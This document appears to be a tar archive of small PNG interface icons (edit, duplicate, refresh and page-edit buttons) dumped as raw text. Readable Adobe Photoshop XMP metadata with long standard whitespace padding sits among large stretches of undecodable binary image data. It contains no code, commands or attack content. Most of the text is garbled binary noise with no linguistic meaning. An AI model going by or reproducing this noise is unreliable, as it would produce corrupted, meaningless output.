                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>dz� cHRMz%������u0�`:�o�_�F�IDATxڼ��oA�gv���%NB��)("2���.U
�

�:(��πH�4AH��E�"�	0�C`>��b�vw���gQ>�T+����7z���G�a�� ���Q$�an熘�~(Q3�Z[in��]�p�'�OTO�����ճ��z�i"oE�PDG�z+�/�s�ZΕ&~>3�߷f'�PJ�-b��z�-/ݯ�屠�וb�X����o�l�ؿ�'��k�^��W����ɛ��hy���f�_;}�kl����inKAp��܏�����o��q��z;�7��M+���0C�K�tw�凴���\>S�٩��O7*a�G��nw��9��
x�8�����3�ዤ���*a�$;)�,O��Z�/�&MǢ#�D�4 �~lCDf�?��$�+_@(�!�s����Y��|�J#%IBGK	��!c�0�¡��(-�ʴ���@�|f&�}R��a6�_4ݨ�b.�IEND�B`�images/page_edit_hover.png000060400000045262152434416630011660 0ustar00�PNG


IHDR''��b	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�=CiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-20T13:09:21+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2015-11-20T19:58:08+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2015-11-20T19:58:08+04:00</xmp:MetadataDate>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:3ff1f1b3-8c7a-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:87fd4ba7-8c73-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:d31096f8-8dc8-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
               <rdf:li>xmp.did:f562aca2-fc36-4c47-8294-8d2eaade51e7</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <xmpMM:InstanceID>xmp.iid:04948cce-37fe-6d4a-9aba-315b47927073</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:7adc153d-8f9f-11e5-94a6-ee3452282a2a</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:56b84efa-853a-9947-a80c-1299202b0438</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:56b84efa-853a-9947-a80c-1299202b0438</stEvt:instanceID>
                  <stEvt:when>2015-11-20T13:09:21+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:04948cce-37fe-6d4a-9aba-315b47927073</stEvt:instanceID>
                  <stEvt:when>2015-11-20T19:58:08+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>39</exif:PixelXDimension>
         <exif:PixelYDimension>39</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>�ؒ� cHRMz%������u0�`:�o�_�F�IDATx���MoA�YXva�(M]Rp���L��գ��&l5iZ�^�%1�Կ`���S&jL
16ZB1@�T
�,���*>h���df�Ofޙ̻�����C�E�ԑ*_�2~kʬ��\��_ތe����m
�%�,����$�}9�9�n&�Q�i���
Km'�a�)��M�~G;ـ�x�2�34��w�z�ۜ	�ZNu�J��3�?�>�It�V���v��\
�msɂ�,8��뵷�|��MU�e�
C�(��})����x�K��gU��D��<��<����w�@Q�\��e�9����b�D�l�=I
ǖY��F%M��Z����&WX���{����?'6�v$�jl�u[I�U,ӓ�k�ڴ�w�j0�Nψ^����I���2�є/��bX�;�U�8�w'�:M�d�6���)����� `���\�I�؃k�S�R�Ӡ�j1nЦ�j'WY�m�\��2z��P��yߥmj��
�I�u����ir���A�>�}���P-M;�����J��4-=�S�Ө
L�H=�U5*��NU �l�|
>��x���_�����w飗{�l�2�z�m�[b��/��N�ЭҔG5�/�����kQ��<j������j��'�3�&!�!5IEND�B`�images/edit.png000060400000003326152434416630007454 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:4F1787A78F7C11E59513BD3E2906FD55" xmpMM:InstanceID="xmp.iid:4F1787A68F7C11E59513BD3E2906FD55" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Q�%�"IDATx�bt[s�X��ݏ_�����, �@1�eAb/�����%�9�,�BȾ���V���M�!�����_��b��Ps�X��W�|Q@�p�g�Xh|��!��ی��UQ�j�7���'���~�R��?�,/�ǣ�ߠ>add:�x��b#�������	���[�!~]r���k�P���s���ʃ��OG��}��98�N�b�dm��@��:�kn=}����~���E
^�`aZp���N ��rM��aĥ���h������U�>���3؆��iO��cp�2!K3��?���n�AH(��(
�T��N��s~�����ül,Pm����'��=��|�u3�Mg�niN�K?��s ̮��ͷ?~�IC����\�iz��W]Ti�
``7��~��k��P��*~��{��[&&,��`�C��D�"FƯ���;�����������O6�iΆz����/�W���`pP?0#���ow�M����_��R���&�/�����~`�d&`tZu����@���v̌�tp��g>���͂�_<�̇���}��0'���/߫�5��w�=���/��?��0(���n;]5!^ӥ����9؀9-�DXV�L2<��t�����9�շ_^J���R���OE�;^[�j�+0���O�@�q"�-���`�Ӕ�$����Ɋ,��p¹;"��x����O����lL�@������LPPS�*���dG��Ot�%K�g��iIEND�B`�images/dublicate_hover.png000060400000003211152434416630011657 0ustar00�PNG


IHDR���tEXtSoftwareAdobe ImageReadyq�e<JiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6DF174D68F7C11E5A93BCE1BD0A62FA9" xmpMM:InstanceID="xmp.iid:6DF174D58F7C11E5A93BCE1BD0A62FA9" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a" stRef:documentID="adobe:docid:photoshop:1e0e82ca-8f7c-11e5-94a6-ee3452282a2a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�qX�IDATx�b���L@�`����b}�����Ĉ�e�Zh�X��3	���e������`���3T��f$�d�@�&����0������?��7�,W�vF�П� y.��p�/��>��-~�Y��o�t����� t��>���
,Hl�/��,�0����Ys�)3�C�@����L��ac�R�����f؎CO�012�2��������������?/�3KPa9�r��q�����ǟ��~�ab`Dw
P�·�sݍ$�9�����('�?��f���s[�ճ/߁��/?t��}���F&`�2��`,!���pfBV&(��l1Loǟ��������13�����t��	N`�N�x����n����8��Q���
 ���n�?��H��4Ca8v��5ԅR�2��w���+�O�#+B�2T�M��>�&H4�dJl��?����z�G�9ZQ�S(�.A�欢A]�0]�^��
a���Y.���dz��7]�����l�;/eϱ��4�wC/K��#P4��ˣ}H��>593�.�F�����N�����贜��4	Pb��dI8/$�clՒLM86W�R��R-��a�(j.�la1.�X�t����������@�����q�/���{Mգ֪`&vm����]ɸ>��/��2��� �X����7���}����~�ҥF*IEND�B`�images/refresh_white.png000060400000137023152434416630011367 0ustar00�PNG


IHDR;0��sBIT|d�	pHYs-�-���J�tEXtSoftwareAdobe Fireworks CS6輲��prVWx�혽JAFG7������—�B�S�4)|_�^�|��%,��ĝ0w�� �g��.�T!g�����<���}ݍ��ϥ_X1,\�b=�
M\�4��߱s~2L��7|b}�5�����ahtoMW}���?w%���?�OϿR���?w�n"������W��O���T�W��'�ׁy�W��W�����~�����c��>��vs���w�|�F?�?�?7��	����?֛���~�/o�E`���i�a�e����W�X�z�j����g ��i����&]������i���_���Oϟ�w���~�/��/���	�?S�_���z��]��_��ڍ��n��ߞ;rw��ܖ:��G�k�/�)x�Sz��HmkBF���)�3�9emkTSx��}�w�F�>&ǖ,oɜ��y�93��{�;�G�%%Z�e�y�A"��[˲���{oa+@�H�Fܭ"��{�K�O~m_�^���
^N�3-�
:�f������L��������5/����P�ã!��}ǟ���V�e���s>eG�؅|�/�_��}���7�4S����)���2Q޳OS�mptz�l�=��M���*�#����.�w�W�c�6&͠�=���O�����i;�x���}�!6�c����)��~��xP���zlNi�ӟ�Zv���!]}��MN�z��A/O�Wj�=Ӧ�&kt�L����6�ѩ1�	
!�2d�]e�m�b�f�޲�U>�=�Ub��3�0{�1;P..�7lߕ2���$l&9بRl</������$l�4:�I��K�4	�&����o�.��qx�?c�Y.�?���|`����T�)]��$��ˆ�n��@Sд<4Ms�;:Bۖ@��۴ǡ6	�i��T�8�O8��g���ا�l�xᨕb���rǭ�U�n�q�����m�Du;f{��ָ-aJ`��6O氹��,�R����VY{ıUF�<�BJ�":oP7�-�O��s�pe����Y��Q	��Q	��QB�4�&�Á���]�B��ҳ�t��4d�4eN�]��X:NO�8ńuQҖ��c)J���h�&?!��!�Fzt�ZW�V��I�QK�3�dL.��L�`e�ôdž�%��m��3��z��*6̠�	|l��j�9�
c�D�zF:!�B&!dB&| �T����
�P�0n2����)��GR:��ZJ}�<�P�
�+���������a
�S0�G�/���1&,�A9Y��y��W��f������A����⼦��M5���J0!cP~^z�
R�lF�'m\Y������J!gZ�6��*A��
Tx���!!&���O��݂��C
Ԫ�7`{G��s���Z�]n�x;c���Kf���4���hNMᣯ��a�=G�#�ޠ��1�q��i�M���h�N����{R�>kx�U��R�cf��¶���l��SΤ���Z<$ ���'
q}����9�7�FnI��%�$�0(
qgO>�1�
������ճt��FA��I�a���%����5�����P���jN�ςP��	���怩�>�����v+�,���Ub�th�!BŌu���7���AIA�]�Mp��MC�>�|a(�����b�8��)�ѼB@s��H��2Z��!'�P
�$ɑ�
��#��U�X��l�-�����M��$4i�JfYP=P��ř�J	��M���A��,���:C0}WJ�=,D���!�%Y�K�r�?M��"��V͚I��]�%y���|;��d���������o���η�mű����,�rJ#�DE�b�V�+U�=� �V41J�	+='H��q����,9Vc�1���I	<�,���'L��˩#*1L#��ʘ8Xg��H��3���{�|B5��\�X���+'�⹄��퇧n�{��r.0�vB���k~/5�8�^S��a~�/�DB��?�&|0�gޫ��b;!�)Ƈ�&ݲ:Zn�ei�!X��
cC�9���Y`k�K�G�@��4�iF��	L�i���ß���(�j�"��x��C�+db9����T۔+���,^(��t�<�:��3������a,��+�q!���*r�����M��5<�[[TY�RZ@o	�F5�Z����
�=TD}*�h�S�ܟ�Nn:��5�� m��9Xz�
n��E�
��(�A�8���%���5��S�0�M2s��Yl�R;%��HQQ�o����Fy�8XGO>�08K`��Bhq��E�zS�r��h��A��۬��=.C�c�lVam9˸�>�~z��<���Gr�e�Ϛ��8��=�?(��0�.
��	����P�[y��y�F��GĕB���} ;�b#����P[%C��gwr��a�y����0Y4d�j�I��i�tK��-۪L-)�T�%��U:���f6���[�1�E4_���%Ȑ|̈́'_"��R�:��ޣ��‡e&Z�ۙid�q�B�KZ�p��>�ˑ��2C�+�f�.z��,Ki�!>�
�^S�x<�����9s���0�)��3�+T�|뒶Ѕ�ᘦȑ�RZ���%˛��	�gq9l�Ofԓ�3�ޣ���>x�����I�?��5Hm�R�]��:��Y4iΎ�ˋ�	�#x/m������R�7���e-b��2x<Ov��m��DzH��tZR ��@�[a��Q�8�H��H��i�fXm�)ɗ��T��'���w�����M*VOB�-&O�&i�j+��Ydu�b=Z��<+s���%�u�>z�`��\�ER�A=����dQH#��}H����i��霳/��0����Rf��ŭq��[�d���gذ�v��߉�7X��&���@r�j�Y+>	%C�|�Bi.ZG|���"�E���/�0��e\����/yf�)-��<KBY�2i�,%�ə�!�8��_�$��LHi�~�DA~���8���v�� &9���h��qC�!��Y�G�)���*���zgl������.���ω6��8���>�z���Y/��G�L�M+L}��_��<���a��s�h���}Բޠ���h�^2�����	]J�9��S�K:u�5Q����x�(�<عJ�O�Sĕ����)�q���w�ڡ���}xK�^���Ab����_�}�`�z��h/�b�� %��\t\�䱁�V"�q^��{��� ���*��1߀䱇�,��G��s^�j�uI�n-�
�ݎ�%$��I�E?������&@�h����$A\a��2�M��c�s#�մZ�$�_.�,.��TJ��<c{5�Y$5��
��Gw�K�Z�y�'�~�����$�F-�����#XB����3�WZ��֬�VAh����z֏HzI�����GTi�DڪEZA���H�8�)����Ee���V�G��jqU�V�ȡC��|�G���=�D7&эk������ɜŋ��gl�&�		mR��z?�����ȏL�;��WM�>	�Oul'Ҧ�2R�(�78kN���#�?_��Z'5�=���%��u��7#��L}�0)^E[�&��3;j��.^�#��:kH���#=�(�s+ֶ<E����n�<m���3���,���}���f�0����Ζxf.�K�њ5{��q&
�@������ۖuQW
/�E����j�VC���F���ٷ�^;�i�O��;V��5�G��^�׬ߠ�����	��#�.�ǔu��0mM�#z�Ѹ�	zՌ�ڞ>�l��L����C��.�Y*�\*���}،=�m�Yt�T�*���l�RJpb�Ϣ�q��7�
��FwC�|�yoBڭ�)�
�X��l�9�j�k�Ǥ
�2Z��Y
g��/K�F��i
g��+�x��X��7�Z�����a�
�?�x��b;� M�c��ߺ�I@p�x�f��L/!�}nj�׬��c�+|�ȡRTU�h��ă�!�rY��Q������S5�G��b���f�x���Q̸(V�o	2�%��m�dCP�%Y���J9�/N�}���T�jeyg�P��ِ�5�T��uNa@�߹"�^��,1����^�{���	�u�5Ґ�i���BVB�G�l���ޟ�G�����~߹�u;���W��}��U��
���	N�/�t;/�Q�sO��7�s�}��.)2��}�4K8g�ɚi8�/����9����{8&`��?*���a���W�}R��<^�C���.压���M�U8�	��[�L�>����_����K΢*��c��g�W�����=����'gd��x�-v���g(��ć8���'��Wx��ExQ7�U��h�,�,��5}���T.QfSz{�o;R���̘�^�Id�+?���G���S�M����P�,<���jl|Rw�J�l�|�g�o;q�K\���c4*���c
��=�{�0���'�Cp:�ȏxS�g	)g:��j�򑝙%�m<�:c�?$#~�=v�5?	\�����GH�2�݊�F�V<�3-�����(LЊ\r4�؝�2���[����.ٶ�v���Oi�����&���goq��g����k���f诙�횡�C'�ꚡk����fh�f�;��ۜ�C����;��j��9��诙�͚��G�^t��k���f诚�����C��
�
d�[�s��5;��,�T���3,�}_��5;����U�󆱳d�וw5gל�v��6���ʻUpv<�o��u�]��5Ck]W��=��+�j���[a����0t]yWst���Gוww���ʻ��k�������;]W���\����u���c��f皝�v�+�6����(�U��-������_��Z&[/1.��b�cv��RFL����
5H۩�պ&���}�,,��Ώ8�=�%�n�,�j�D�B}�M�JY�=n#�9]��j���Zs�6D�m{̵-�����oPW�ؿ���u��/�_T4�k�E
���}QQ��<���Dwb>e�7`���q��f�:[p-�n��_+C?��T�r������oS9������g�S\AK�cQWZG�hQn��FQ���#V�P�*���i��W�`#�7�=U���8��Qe{[8�&8NMd�p�B,�>�aV�n��>�cv|z�>P�k��I���l�ֆ��Vm�mA��Z���[����w��L���0�u�.�E�6BmG�k���Qk�r�6#����\o�h�N�J��jZ�^�h���7�?�_]Je������Y�8F�-i��a�5f~�g��n{Һ����4m]Vk���b�<�BOtq�tL�.��΀������'o	:x;rH�W��3l/#ߔ3���:d�)�#�g��>��g����}d����r!_���Դ���1������5�o����yZE�z;�PN��te�E1�=��R�xʎ4/1�{ͭ�k��ᯋ�1~&���#3��p�[�w��)�t������zH6NcW�$����8]�~�20z���ɳdϸ�c��ȝ%�/~��g�df��)>��3e�)����Xr�E��Dz�"z,��1��yOV���.+[�H�w쯨AZ�I���=y�<�b�G�h�)��[˱�C��3�Wv�תzI�Em�]3t���Cg�kY��r�F9�҇.M��ȸAl�K��2�8�Sp�g��׳���f�+j�x�nY�>�>�.����_�5���ԫޖ2����r������xg�T�>W�C�$�A���)f�o?�0�Ɨ~��=���l���|>n��GZ��LE])�}����z�V2��5K*���Ϟ�#�}��~�l��Z�63�c���Vg+\��n	q�'75׍3�X�9��u����L���-d�J��>��t��rY��e��dUQ�b9�Xm�29��8��\�3�4������E�?���-���#�c��3#	e��q�c=֚8ל��,�5*Vr;�X�iZ*�GsJ$����`���X��
EΡOY-r��c��1~�!Ps�t7ܻR��G|��at)���1��S��b���MY��@.�mH�9KG��w�g���vd�a�}-�@|�����K3_���w�KI��f�;}�ǝ�|ܟ*�
����|�zFaټ��
����bL�}�w�$�N�H�.��ʠ�=G_(����w�0*X�ğ!��1d�w�*�Viִ����q���6z�>�30q�Ț����tP�
9�&��y��Śy�HkJb�U{�M�Q~S��֤O�1t�������eY�_�cG9��P@�l�G�;>F�:ƍ��B�%���}^Kt����魛�r8�xP[HU��G|�����`�w�[7��Ѱj��Y��j�xh�Y۰Vp]�gcYDO���Zڳ�宒B��{�gd>�*��@��˸�*͗i��`y�ē=�{nWy밄|�)�Q@�8�{h)v�=+�7�=]x���N�9���ҫ,G�&�*��0���h=��_W����`u'h�!^
�d�R�Zw��
��y���ϭ�zmB����pƢ���[1��^oX�7��z��J���q�Zqh�����X�#���=0�����b%�&�(�����oީY�f�u���b�No1V3�	W�%�mJ6��Y�g:<�l%j�i���FCѵַ�j-�_Z��H�;���KPU����e���G��|�!c�\"���n��ǘ�m �P�6Ϋ�RR��A+%u���Ǯf���Յ�������>�7��ݏb�|j�6n��r�#���M�cJ�m�1p	��whǸm5s��(V�I��y�d�.ٴV6^�Ь.�'�L�{����D5����#���OX[6Uh�a���O瀇��փ�>�Nʧ������&�_m����*�3�aZ"�	��VÆ���y_�{�л=!�����W�=�\/��qJ�|A���HN0�2�������&xF('�����QA�>l�큹�Uȩ��߉Ä���{��Y�s<���_�K|n�#io�L�kv/򀦑������r�m��3��a�l+�\���`�=�Ԡ�w:�ƙΌI3hw��3-h���۳�mv����9=��b�>ƍ�_�����`����p�)mt��Y���6n�Շ�䄮G��ވ�q
�R��6�5Y��e�g6=�Qg�N�MЋ1{�sv��.E>�?7/q����գ>��){�Y�}���
�x�`@����&^��gt�{,X$�}ϔ�����>;����:�����{��Qw:k�c��Y��Eo9
�/�׳���s<���O��C�<F���.�Hȿ��L����8��{{�����a���#�p�\T
~�s:��u��5}8��w�/�v���r�8m�����B��c�v�Cӥ��A	t�8m��Ü�r�۱����X�C"�.��b���E��8��x9v&4]T��������3�g:�l|j4jT�am�g�c�0�u�t-G��[��7��7쿄�D:�s<��F��pkw�uO�gǽ�?S�[��OG|K��:qprʺwr��k��Sr���&h�ڣX��8�ш�X<�K���.�g,2p�R�-(�`a��%06�5��X���c�+&��W�=�
�Թc>J_�.��e]�/��c����N:x��*@�(a.���ý���{�tP��O���V&��8uG���N�
g=\�G
��3i��`�l�Z�s35�'M͇v��R�Q�ǐ�L%���-8t�gg� g��q�7���n��d__����SU4r�A�9]�A��Į��!���홃|栂�n�ub�f���h��h��䙦�7'Az��ˣ�?3�x`�`�al���Z-��s�A����B�x[f�Wiu�Z]��խ=�[��!nj�G\���<lL�f���*���Rب9�xM���K����K�O��i<��3��F�����y��?�0^8H/hM��]�ԭ<4�h
�����i�rG'Bh��~��8�&!}�!m�xd�`��!@��]e�ą�V������Wqܺe�mF;�C� �<|[㶄(��z;�<����dK�~�v�FXe��V�Y��
)���A��w§�Y���N.�{fEhT�F%hT�F%hT�F-���h�3O���o(=�KW!9NCL~��8K������"J��Qz,E�������!dB!d�H�y��˝t�t8cL��L.��Vv8L{l�/K^�7���Ul�A���&���4s��v	��7�tBH'�LB�$�L
�@�������a��9)�E~�!��@j-�>��E(K�ϕ��[�|���d��*L7|)���1a���ɒxM��5����7�@X��@T�!?��yM3
G3�j��K-�`B�����B�Pٌ&O4ڸ�r���S��N"gZ�6��*A��
Tx���!!&���O��݂��C
Ԫ�7�9xп��CTk-w�.7\��1��揮��4���hNMᣯ��a�=G�#�h��Uom�DӤ�N����{R�>kx�U��R�cf��¶���l��SΤ��ӊ�ųA��Y�0��a� ��q �'Y>��z#@n䖄Y�K���Wq�����0{zy}�\=K'�qlZ����_���\c���.��iK��,�>� Y�n�J�	��ho�"�.q��C�N�r�Y:4��bƺ�@֛�K��� \�.��&�l�˦�LF�0����to1�C���?�h^! �9|r$q̂m-]�q��@��HtY����*,H`6	���NoN��zi�4z��	��TB�
